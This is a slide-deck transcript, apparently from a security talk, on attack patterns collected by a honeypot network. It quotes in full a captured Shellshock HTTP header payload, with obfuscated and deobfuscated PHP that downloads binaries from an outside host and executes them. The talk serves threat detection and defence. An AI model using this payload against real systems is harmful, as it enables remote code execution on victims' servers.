global attack patterns to improve threat detection
TRANSCRIPT
Global attack patterns to improve threat detection Curt Barnard, Software Implementation Engineer
• Evolution of methods used in mass exploitation
• Adoption of these methods by malicious actors
• Adaptation of these actors to defensive measures
Key Takeaways
Crawlers, bots, and automated exploitation scripts crowd the internet
Up to 80% of all site traffic generated by bots [1]
Vulnerabilities in common, core programming libraries make juicy
targets for malicious actors
[1] https://www.incapsula.com/blog/bot-traffic-report-2014.html
The internet is noisy
• Many malicious actors employ a “spray and pray”
methodology
• Recent examples: Heart bleed, Shellshock, weak SSH
credentials
• Commoditization of access is prevalent with non-targeted
attacks
How do you get warnings of attacks?
Endgame employs a SensorNet of dummy web services to collect at-scale attack data
– Multiple VPS providers
– Multiple geographic regions
– Multiple OS configurations
– Centralized logging
When hackers talk, we listen
Shellshock Attack
We have observed a bad actor executing:- An obfuscated php code - By leveraging a shellshock vulnerability- Via multiple client IP addresses
• Bash vulnerability related to variable assignment• Can stuff it in HTTP headers
() { :;} ; <commands>
Shellshock PrefixCommand sequence
How Shellshock is formatted?
() { :;} ;echo;/usr/local/bin/php -r '$a = "http://x5d.su/x/AS1";''$b = "http://x5d.su/x/AS2";''$c = sys_get_temp_dir();''$d = "AS1";''$e = "AS2";''$f = "chmod 777";''$g = "file_put_contents";''$h = "system";''$i = "file_exists";''$j = "fopen";''$k = "uptime";''if ($i($c . "/$d"))''{''exit(1);''}else{''$h("$k");''$g("$c/$d", $j("$a", "r"));''$g("$c/$e", $j("$b", "r"));''$h("$f " . $c ."/$d");''$h("$f " . $c ."/$e");''$h($c . "/$d");''$h($c . "/$e");''}'
Obfuscated php code
This code is unclear to confuse pattern matchers, but not very effective against humans
system("uptime");file_put_contents("AS1", fopen("http://x5d.su/x/AS1", 'r'));file_put_contents("AS2", fopen("http://x5d.su/x/AS2", 'r'));system("chmod 777 AS1");system("chmod 777 AS2");system("AS1");system("AS2");
Deobfuscated php code
This is the definition of spray and pray, where the bad actor hopes to get something by shotgun approach
• Attackers are indiscriminately targeting web services with
ShellShock
• They are using advanced techniques to prevent automated
detection of TTP’s
• Sophistication of these attacks have increased over time
• Several (likely compromised) sources using the same
infrastructure
The shocking summary
• Evolution of methods used in mass exploitation
• Adoption of these methods by malicious actors
• Adaptation of these actors to defensive measures
Key Takeaways
